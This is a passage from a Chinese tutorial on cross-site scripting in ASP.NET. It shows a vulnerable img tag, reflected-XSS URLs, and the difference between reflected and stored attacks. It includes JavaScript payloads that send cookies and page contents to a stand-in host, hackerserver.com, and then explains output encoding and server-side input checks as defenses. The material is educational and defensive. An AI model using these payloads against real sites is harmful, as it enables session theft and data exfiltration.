這段代碼在舊版的IE8和IE8以下的版本都是可以被執行的���,火狐也能執行代碼,但火狐對其禁止訪問DOM對象���,所以在火狐下執行將會看到控制里拋出異常:document is not defined (document是沒有定義的)
再來看一下面這段代碼:
<div> <img src="/images/handler.ashx?id=<%= Request.QueryString["id"] %>" /> </div>
相信很多程序員都覺得這個代碼很正常,其實這個代碼就存在一個反射型的XSS攻擊���,假如輸入下面的地址:
http://www.xxx.com/?id=" /><script>alert(/xss/)</script><br x="
最終反射出來的HTML代碼:
<div>
<img src="/images/handler.ashx?id=" /><script>alert(/xss/)</script><br x="" /> </div>
也許您會覺得把ValidateRequest設置為true或者保持默認值就能高枕無憂了���,其實這種情況還可以輸入下面的地址達到相同的攻擊效果:
http://www.xxx.com/?id=xx" onerror="this.onload()"onload="alert(/xss/)" x="
根據XSS攻擊的效果可以分為幾種類型
第一���、XSS反射型攻擊,惡意代碼并沒有保存在目標網站���,通過引誘用戶點擊一個鏈接到目標網站的惡意鏈接來實施攻擊的���。
第二、XSS存儲型攻擊���,惡意代碼被保存到目標網站的服務器中���,這種攻擊具有較強的穩定性和持久性,比較常見場景是在博客���,論壇等社交網站上���,但OA系統,和CRM系統上也能看到它身影���,比如:某CRM系統的客戶投訴功能上存在XSS存儲型漏洞���,黑客提交了惡意攻擊代碼���,當系統管理員查看投訴信息時惡意代碼執行,竊取了客戶的資料���,然而管理員毫不知情���,這就是典型的XSS存儲型攻擊。
XSS攻擊能做些什么
1.竊取cookies���,讀取目標網站的cookie發送到黑客的服務器上���,如下面的代碼:
var i=document.createElement("img"); document.body.appendChild(i); i.src = "http://www.hackerserver.com/?c=" + document.cookie;2.讀取用戶未公開的資料,如果:郵件列表或者內容���、系統的客戶資料���,聯系人列表等等,如代碼:
<!--讀取當前頁面的內容提交到黑客服務器上進行分析-->
var h = "<form name='f' action='http://www.hackerserver.com' method='POST' target='hidfrm'><input name='data' type='text' /></form><iframe name=hidfrm></iframe>" var e = document.createElement("div"); document.documentElement.appendChild(e); e.style.display = "none"; e.innerHTML = h; var frm = document.forms["f"]; frm.data.value = document.documentElement.innerHTML; frm.submit();<!--讀取當前頁面的內容提交到黑客服務器上進行分析-->
var xhr = new xmlHttPRequest(); xhr.open("POST or GET","/目標網站其他頁面的URL(如獲取郵箱列表的地址)"); xhr.onreadystatechange = function (e) { if (xhr.readyState == 4) { var h = "<form name='f' action='http://www.hackerserver.com' method='POST' target='hidfrm'><input name='data' type='text' /></form><iframe name=hidfrm></iframe>" var e = document.createElement("div"); document.documentElement.appendChild(e); e.style.display = "none"; e.innerHTML = h; var frm = document.forms["f"]; frm.data.value = xhr.responseText; frm.submit(); } } xhr.send(null);3.前面兩個是讀的操作���,其實還可進行寫的操作,比如說:刪除用戶的博客,轉發指定的微博���,向用戶的聯系人發送帶有惡意代碼的信息���,進行下一步的傳播,如下面代碼:
var xhr = new xmlhttpRequest();xhr.open("POST", "目標網站的執行頁面");xhr.send(param);當然XSS攻擊方法遠不止這些,黑客有很多天馬行空的方法���,只要是讀和寫的操作���,那么我們有什么防御的方法呢?
XSS攻擊防御
一���、輸出檢查
根據XSS攻擊的條件���,我們可以對用戶輸出進行檢查,使用系統的安全函數進行轉義將數據和代碼分開���,asp.net
的安全函數可以參考http://msdn.microsoft.com/en-us/library/system.web.httputility.aspx���,根據不同的場景使用正確的安全函數,否則效果適得其反���,如果下面例子:這個例子在HTML標簽的屬性內輸出使用HttpUtility.HtmlAttributeEncode函數進行轉義看似合情合理���,但這個是特殊的屬性���,它被解析為元素的事件,這類型的屬性在某特定條件下觸發事件并執行里面的代碼���,如本例當用戶點擊這個鏈接是會執行里面的代碼���。
<a href="#" onclick="javascript:var name='';alert(/xss/);//';alert(name);">hahaha...</a>
點擊標簽將會彈出“/xss/” 而不是“';alert(/xss/);//” 注意:“'”被轉義為“'”即是HTML的一個實體���,最終還是被解析為"'"字符���,所以腳步被成功注入。
正確的做法應該是使用JavaScriptStringEncode函數或者 JavaScriptStringEncode和HtmlAttributeEncode函數:
<a href="#" onclick="javascript:var name='<%= HttpUtility.HtmlAttributeEncode(HttpUtility.JavaScriptStringEncode(Request.QueryString["n"])) %>';alert(name);">hahaha...</a>
通常用于檢測用戶輸入的數據是否符合預期的格式���,比如日期格式,Email格式���,電話號碼格式等等���;輸入檢查必須在服務端進行;當然為了提高用戶體驗和減輕服務端的資源客戶端也要進行一次檢查���,但服務端檢查始終是必須的���,有個別程序員卻調過來了認為客戶端檢查是必須的,服務端檢查是可選的���,其實這是錯誤的邏輯���,因為客戶端很容易被黑客繞過。
